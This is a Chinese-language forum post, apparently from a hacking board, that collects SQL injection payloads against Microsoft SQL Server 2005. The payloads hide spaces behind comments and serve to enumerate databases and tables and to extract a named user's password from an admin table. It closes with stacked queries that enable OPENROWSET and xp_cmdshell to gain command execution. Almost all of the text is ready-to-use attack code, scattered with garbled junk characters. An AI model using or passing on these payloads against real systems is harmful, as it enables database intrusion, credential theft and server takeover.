MSsql2005注入语句

admin

* ?1 a' t* y0 x* Y9 P4 J
  }% Y/ B% _3 P8 g
( m4 N0 g: V4 M1 r! {: s9 Z0 j! n! o[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

# w. m  A8 k; @  f6 H: ?- f7 `8 k爆表语句,somedb部份是所要列的数据库，红色数字1累加


1 a0 @7 z( ^. C9 B/ c# q* t7 U[Copy to clipboard]CODE:
! y" I" R1 g4 V/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

( A0 z% C  O. a9 [0 N% e0 c爆字段语句，爆表admin里user='icerover'的密码段
8 l( A2 @/ p/ ]
% U  J# E$ }0 _" q- J
3 _, s% k) Z/ q) Y, v[Copy to clipboard]CODE:
. l+ _, ?- ]5 Y$ U, L  _, W, P) T8 z  Z**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
/ p2 f6 y  l  I& x5 {+ U; X
8 F, I+ A9 X, e* ]mssql2005默认没有开xp_cmdshell的，openrowset也不能用
$ _) T# x0 R+ z. `: D5 c3 T# j, M如果是sa权限，可以这样来开启
开启openrowset


[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
* I6 y# T2 P: p- t
: o: X) J& ~- e% X' u开启xp_cmdshell


; E/ z, R6 t; c& {7 l! W8 w$ P[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安
0 \; @) T5 X& ^1 n( h